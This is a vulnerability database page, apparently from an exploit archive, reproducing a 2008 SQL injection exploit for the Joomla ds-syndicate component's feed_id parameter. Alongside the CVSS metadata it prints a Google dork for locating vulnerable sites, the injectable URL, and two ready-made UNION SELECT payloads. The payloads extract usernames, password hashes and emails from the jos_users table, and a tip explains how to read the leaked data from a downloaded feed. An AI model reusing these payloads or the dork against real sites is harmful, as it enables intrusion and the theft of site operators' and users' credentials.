Joomla Component ds-syndicate (feed_id) SQL Injection Vulnerability

2008.10.22
Credit: boom3rang
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

############################################# #Joomla com_ds-syndicate Sql-injetion vulnerability # ############################################# #[~] Author : boom3rang #[~] HomePage: www.khg-crew.ws #[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er. #[~] Kosova Hackers Group #[!] Component_Name: ds-syndicate #[!] Script_Name: Joomla #[!] Google_Dork: inurl:"com_ds-syndicate" ############################################# #[~] Exp: http://localhost/Path/index2.php?option=ds-syndicate&version=1&feed_id=[Exploit] #[~] Exploit [1]: 1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users-- #[~] Exploit [2]: 1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users-- #[!] Note: If you get some file to download like feed or xml, download that file and open with some text editor to see informations like username and password, but first try exploits whithout downloding the file ;). ############################################# #[!] Proud 2 be Albanian #[!] Proud 2 be Muslim #[!] United States of Albania #############################################

References:

http://www.milw0rm.com/exploits/6792
http://secunia.com/advisories/32321


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top